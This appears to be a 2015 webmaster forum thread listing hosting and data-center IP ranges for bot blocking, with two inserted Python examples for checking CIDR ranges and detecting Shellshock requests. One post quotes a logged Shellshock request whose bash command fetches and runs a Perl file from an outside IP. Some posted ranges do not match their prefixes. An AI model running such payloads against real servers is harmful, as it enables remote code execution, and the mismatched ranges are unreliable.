Server Farms - February 2015

Tracking and Reporting Data Center IP Ranges

         

incrediBILL

5:51 am on Feb 17, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Continuation of the Server Farm threads.

This is where we report data center IP ranges as they are discovered or change in the rapidly evolving assigned IP landscape.

Past server farm threads:

keyplyr

9:03 am on Mar 30, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Digital Network, Russia A.K.A. di-net.ru or msm.ru:

95.163.64.0/18
95.163.128.0/17
95.163.64.0 - 95.163.255.255

213.248.0.0/18
213.248.0.0 - 213.248.63.255

This is hosting (server farm) but they also offer ADSL, network-to-network fiber and something called "optical data channels" which might be video/movie streaming.

keyplyr

10:44 am on Mar 30, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



WW says:
Age:Allowable time to edit post has past.

Hate it when it says that!

Nope, I was wrong. Searches for "optical data channels" mostly returned patent papers. Those are always a barrel of fun. What I think I learned was that optical data channels are a beneficial alternative to current fiber for node-to-node communications. Pretty much a no-brainer if you ask me!

dstiles

7:52 pm on Mar 30, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



As far as I know Virgin Media does not do hosting, and there does not seem to be anything on their site to indicate they do. Certainly Lucy's IP has open ports but my suspicion is that it's a business or net-nut running its own server (216 and 217 both have open ports so probably both "owned" by the same person/business). This arrangement happens a lot on broadband lines - I run a backup mail server on mine, for example.

I often see bots other than obvious botnets run from broadband (personal or business) that seem to be otherwise simple browsing connection points. Typical at the moment are screaming frog and email-marketing-robot, both blocked.

lucy24

8:15 pm on Mar 30, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I only know that the specific IP I named is (or includes) a server because my lookup told me that "1 website uses" etcetera. That implies a reasonably permanent address.

O' course it could be the boss's nephew doing some botrunning on the side-- or an infected computer that only coincidentally lives on the same IP as a website. (It was an established botnet, though I can't remember which one. Heck, it was almost 24 hours ago.)

Angonasec

4:24 am on Mar 31, 2015 (gmt 0)



Sinobot living at Telentia Chicago
104.222.192.0 - 104.222.223.255
104.222.190.0/23 and 104.222.192.0/18 ber...locked!

keyplyr

5:04 am on Mar 31, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



104.222.190.0/23 ? Bigger fish at:

servernetwork.com A.K.A. networklayertech.net
104.222.160.0/19
104.222.160.0 - 104.222.191.255


And my math says 104.222.192.0 - 104.222.223.255 = 104.222.192.0/19 (not 18)

But other than that, thanks for the ranges Angonasec :)
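The prefix-versus-range check raised in the post above, as an added example that is not part of the original thread: it uses Python's standard `ipaddress` module to confirm that a posted CIDR and a posted first-last range describe the same block before either goes into a blocklist. The function names and the last sample entry are assumptions made for illustration.

```python
import ipaddress

def range_to_cidrs(first, last):
    """Minimal list of CIDR blocks that exactly covers first..last."""
    lo, hi = ipaddress.ip_address(first), ipaddress.ip_address(last)
    return [str(n) for n in ipaddress.summarize_address_range(lo, hi)]

def check_claim(cidr, first, last):
    """Compare a posted prefix with a posted first-last range.

    Returns (ok, detail). strict=True rejects prefixes whose base
    address has host bits set, a common slip when widening a block.
    """
    try:
        net = ipaddress.ip_network(cidr, strict=True)
    except ValueError as exc:
        return False, f"{cidr}: invalid prefix ({exc})"
    exact = range_to_cidrs(first, last)
    if exact == [str(net)]:
        return True, f"{cidr} == {first} - {last}"
    return False, (f"{cidr} spans {net[0]} - {net[-1]}, but "
                   f"{first} - {last} is {', '.join(exact)}")

# Pairs taken from the posts above; the last entry is constructed.
CLAIMS = [
    ("104.222.192.0/18", "104.222.192.0", "104.222.223.255"),
    ("104.222.160.0/19", "104.222.160.0", "104.222.191.255"),
    ("104.222.192.0/17", "104.222.192.0", "104.222.255.255"),  # constructed
]

if __name__ == "__main__":
    for claim in CLAIMS:
        ok, detail = check_claim(*claim)
        print("OK  " if ok else "FIX ", detail)
    # A range that needs more than one block (Digital Network, earlier post)
    print(range_to_cidrs("95.163.64.0", "95.163.255.255"))
```

A range that is not a single aligned block comes back as several prefixes, which is why some providers in this thread are listed with two CIDR lines for one range.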

keyplyr

8:56 am on Apr 1, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month




domaine-achat.fr A.K.A. privianet.com or serveur-dedie.fr*
91.212.205.0/24
91.212.205.0 - 91.212.255.255

*With 3 TLD aliases, it's a solid bet there's more ranges (cue Wilderness.)


HostEx
31.193.192.0/21
31.193.192.0 - 31.193.199.255

keyplyr

9:09 am on Apr 2, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month




volia.net
93.73.0.0/16
93.73.0.0 - 93.73.255.255

Ukraine ISP that also offers hosting. I got hit with a typical probe for php vulnerabilities. Unable to scan to determine server ranges. With mixed service providers I usually wait and see how much trouble they become before taking defensive measures. Don't really know if this tactic serves my purpose well, but it enables me a sense of pragmatism.

blend27

12:15 pm on Apr 2, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



New one for me from DIGITALOCEAN

NetRange: 45.55.0.0 - 45.55.255.255
CIDR: 45.55.0.0/16
NetName: DIGITALOCEAN-11
RegDate: 2015-02-05

trintragula

12:34 pm on Apr 2, 2015 (gmt 0)

10+ Year Member Top Contributors Of The Month



I've seen hits from all across:

volia.net
93.72.0.0/13

(though volia have a lot of other ranges)

I always enjoy visits from these guys because of their charming line in rDNS, e.g.

93.72.0.0 born.clothes.volia.net
93.74.48.236 pileless.fatalities.volia.net
93.75.101.231 juxtaposed-cupboard.volia.net
93.73.122.41 transistor.inhere.volia.net
93.73.186.130 productless.trademark.volia.net
93.73.38.10 arguable.hygiene.volia.net

Interestingly, 90% of them are Synapse visits...

dstiles

8:52 pm on Apr 2, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



keyplyr - volia.net - I have about 100 hits from the company since about 2010 but very few are later than mid-2013. Most hits were one-offs; about five over 10. Frankly, I get far more aggro from my own country! :(

I'll leave blocking for now, until something hits hard-ish.

lucy24

11:27 pm on Apr 2, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



New one for me

At this point I got curious and went to do some spot-checking, as I'd got much of 45 listed as bogons (not sure why, since some of them are claiming registrations as far back as 1996). In a race to see how many I could hit before free lookup got annoyed and started demanding proof of humanity on every third request:

Holy ###, what a dense cloud of robots.
45.2-3 IANA Reserved (I think this means nobody will ever be visiting from there)
45.4-7 bogons under LACNIC
45.8-15 bogons under RIPE
RIPE I can understand, but why on earth does LACNIC need extra room when you can still walk in off the street and pick up a /12? Be that as it may, I think a lot of 45 has been reassigned; 64-65 (at a minimum) belongs to assorted APNIC countries in RIPE-sized niblets, and there are a couple of LACNIC countries further down.

Moving on ...

45.16-31 45.16.0.0/12 AT&T

45.32 Choopa

45.33.0-127 45.33.0.0/17 Softlayer / Linode
45.33.128-143 45.33.128.0/20 Hurricane Electric
45.33.144-159 45.33.144.0/20 Enzu
45.33.160-191 45.33.160.0/19 Colo America
45.33.192-207 45.33.192.0/20 Infinite Web (never heard of 'em, but they don't sound human)
45.33.208-223 45.33.208.0/20 nothing yet
45.33.224-239 45.33.224.0/20 Cloud South (Serverlogy Corp.)
45.33.240-255 45.33.240.0/20 Hengtong IDC

I realize that there are plenty of perfectly legitimate humans with Chinese names, and some of those humans may choose to give Chinese names to perfectly legitimate US-based corporations ... but still, I am always suspicious. Right now I'm in high hopes for a
45.32.0.0/15

45.34-35 45.34.0.0/15 Psychz
... OK, make that
45.32.0.0/14

After this it gets less interesting, and for a while breaks into annoying /21 and even /22 slivers (honestly, who do they think they are, RIPE?). Highlights:

45.38-39 45.38.0.0/15 EGI Hosting
45.40.48-63 45.40.48.0/20 XeHost
45.40.96-127 45.40.96.0/19 KVC Hosting
45.40.128-191 45.40.128.0/18 Godaddy
45.40.192-255 45.40.192.0/18 OppoBox

45.41.0-63 45.41.0.0/18 Virtuzo (human? who knows...)
45.41.80-95 45.41.80.0/20 Hengtong IDC (yes, them again)
45.41.192-255 45.41.192.0/18 HostAware

45.42.32-35 45.42.32.0/22 Epic Hosting
45.42.52-55 45.42.52.0/22 Desert Cloud
(Anyone know? Google was amazingly unhelpful, aside from offering a lot of pretty pictures, but the name element "cloud" naturally raises suspicion.)
45.42.80-95 45.42.80.0/20 Hengdong (for those who are keeping count, that makes three)
45.42.128-255 45.42.128.0/17 Roya Hosting
Sadly, the intervening bits of 45.42 appear to be human.

45.43.32-63 45.43.32.0/19 XeHost
45.43.128-191 45.43.128.0/18 Cloud South
(see above about "Cloud")
45.43.224-239 45.43.224.0/20 Yunxin LLC
(and see above about perfectly legitimate humans with Chinese names)

45.45.128-255 45.45.128.0/17 Contina
(wtf? I thought Contina was infection-prone Russians)

45.54.0-127 45.54.0.0/17 Host Virtual
45.54.128-255 45.54.128.0/17 Union Pacific Railroad
(I mention this only because I was staggered to learn that any railroad in the US is acquiring assets. Of any kind.)

45.55 45.55 Digital Ocean
(This was where we came in.)

45.56.0-63 45.56.0.0/18 Google Fiber
(wtf? Was there a post about this?)
45.56.64-127 45.56.64.0/18 Linode
45.56.128-191 45.56.128.0/18 Hosting Services / Simple Link
45.56.192-255 45.56.192.0/18 Sago Networks
(The last is human, darn it, so there goes your /16 out the window.)

45.57.0-127 45.57.0.0/17 Netflix
45.57.128-255 45.57.128.0/17 B2Net / ServerMania
(Well, that's something at least.)

45.58.48-63 45.58.48.0/20 HostUs
45.58.64-79 45.58.64.0/20 DropBox
45.58.112-127 45.58.112.0/20 ReliableSite / Choopa
45.58.128-191 45.58.128.0/18 SharkTech
(Don't know what that last one is, but it sure doesn't sound human.)

45.59.16-31 45.59.16.0/20 Aventice
... and that was as far as I got before free lookup pulled the plug. Watch out for this range, though; they're sublets, so absolutely anything could happen, at absolutely any size. (The random number I looked up was a /29.)

keyplyr

12:43 am on Apr 3, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month




45.41.0-63 45.41.0.0/18 Virtuzo (human? who knows...)

virtuzo.com = dedicated servers

keyplyr

8:26 am on Apr 5, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month





filoo.de
93.190.64.0/21
93.190.64.0 - 93.190.71.255

keyplyr

8:46 am on Apr 5, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



45.58.64-79 45.58.64.0/20 DropBox

@lucy24 - Thanks for the 45s but curious why you included DropBox. Have you seen hits to your sites from DropBox? Do they crawl? hot-link?

I was under the impression they were just a file depository.

lucy24

8:03 pm on Apr 5, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I mentioned them only in the general category of "places that are not likely to result in a human visit, so if you like blocking the largest possible chunks this one is probably safe". (No point here specifically, since /18 is no more bytes than /17, and I wouldn't even know how to calculate how much traffic you'd need to get before that extra digit made a difference-- if in fact it ever does.) afaik I've never set eyes on them.

lucy24

11:33 pm on Apr 5, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Elsewhere...

138.128.0.0/17
Fluid Servers

Never heard of 'em before today, but when the first visit is from a long-running botnet...

keyplyr

12:42 am on Apr 6, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month




I have 138.128.0.0/17 as servermania.com

bobothecat2

8:24 pm on Apr 7, 2015 (gmt 0)

10+ Year Member



Another one to add to the 45. list:

Hostaware Singapore/Micfo, LLC.

45.62.32.0 - 45.62.63.255
45.62.32.0/19

dstiles

8:24 pm on Apr 8, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Lucy: Sharktech - I have the following for them, all blocked (and including your latest - thanks!).

45.58.128.0 - 45.58.191.255
64.32.0.0 - 64.32.31.255
67.21.64.0 - 67.21.95.255
70.39.64.0 - 70.39.127.255
174.128.224.0 - 174.128.255.255
198.148.80.0 - 198.148.95.255
199.115.96.0 - 199.115.103.255
204.188.192.0 - 204.188.255.255
208.98.0.0 - 208.98.63.255

blend27

3:59 pm on Apr 12, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



A Small Orange LLC
NetRange: 23.91.64.0 - 23.91.79.255
CIDR: 23.91.64.0/20

23.91.64.40 (server1.taterinc.com) pretends to be Mozilla/4.0 (compatible; MSIE 5.5)

bobothecat2

7:22 pm on Apr 12, 2015 (gmt 0)

10+ Year Member



New (to me) VolumeDrive range:

104.193.8.0 - 104.193.11.255
104.193.8.0/22

keyplyr

5:53 am on Apr 13, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month




tldc.com A.K.A. uaservers.net
217.12.192.0/19
217.12.192.0 - 217.12.233.255

Ukraine Hosting on Dutch Data Center

keyplyr

12:47 pm on Apr 13, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



^^ itldc.com ^^

keyplyr

1:28 am on Apr 16, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month




hospedajeydominios.com (hosting and domains in Spain)
46.29.48.0/22
46.29.48.0 - 46.29.51.255

keyplyr

1:53 am on Apr 16, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Bash attack attempted from these guys:

"GET /cgi-bin/hello HTTP/1.0" 403 301 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download [195.10.212.17...] -O [195.10.212.17...] [195.10.212.17...] /tmp/ji*;perl tmp/ji;rm -rf /tmp/ji*\""

DataGuard (dataguard.no) multi-product ISP including hosting/colo
213.158.224.0/19
213.158.224.0 - 213.158.255.255
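Detection logic for the kind of request quoted in the post above, as an added example that is not part of the original thread: it parses the request, status, referer and user-agent fields of an access-log line (including backslash-escaped quotes inside a field) and flags any field carrying the Bash function-definition prefix `() {`, the pattern commonly called Shellshock. The sample lines are constructed, use documentation-reserved addresses and a harmless `echo`, and the function names are assumptions.

```python
import re

# Tail of a combined-format line: "request" status bytes "referer" "agent".
# Quoted fields may contain backslash-escaped quotes, as in the logged request.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(QUOTED + r' (\d{3}) (\S+) ' + QUOTED + r' ' + QUOTED)

# Bash function-definition prefix: "()" followed by optional space and "{".
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')

def parse_line(line):
    """Return the fields of one log line, or None if it does not parse."""
    m = LINE_RE.search(line)
    if not m:
        return None
    request, status, _size, referer, agent = m.groups()
    return {"request": request, "status": int(status),
            "referer": referer, "agent": agent}

def scan(lines):
    """Return (line_no, field, status, needs_followup) for each hit.

    needs_followup is True when the server did not answer with a 4xx/5xx,
    meaning the request may have reached a CGI handler.
    """
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skipped, not guessed at
        for field in ("request", "referer", "agent"):
            if FUNC_DEF_RE.search(rec[field]):
                findings.append((n, field, rec["status"], rec["status"] < 400))
    return findings

# Constructed sample log lines (not taken from any real server).
SAMPLE = [
    r'192.0.2.10 - - [16/Apr/2015:01:50:00 +0000] "GET /cgi-bin/hello HTTP/1.0" 403 301 "-" "() { :;}; /bin/bash -c \"echo constructed\""',
    r'198.51.100.7 - - [16/Apr/2015:01:51:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1)"',
    r'203.0.113.5 - - [16/Apr/2015:01:52:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "() { :; }; echo constructed" "-"',
    r'truncated line without quoted fields',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit answered with 403, as in the quoted request, was refused at the server; a hit answered with 200 is the one to investigate first.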

keyplyr

9:20 am on Apr 17, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



RamHost
199.180.248.0/21
199.180.248.0 - 199.180.255.255

Ecatel.info
80.82.64.0/20
80.82.64.0 - 80.82.79.255

keyplyr

8:09 am on Apr 18, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



alphamegahosting.com
86.109.8.0/21
86.109.8.0 - 86.109.15.255

webhosting.uk.com
109.75.160.0/21
109.75.160.0 - 109.75.175.255

(is there an echo in here?)

dstiles

9:07 pm on Apr 18, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



alphamegahosting is actually 86.109.0.0/19 but thanks for the hint! :)

keyplyr

9:42 pm on Apr 18, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Thanks dstiles - my mobile tool doesn't supply broader ranges sometimes, even if I manually input it, it sometimes gives no results. Better than waiting days until I get back to the office though.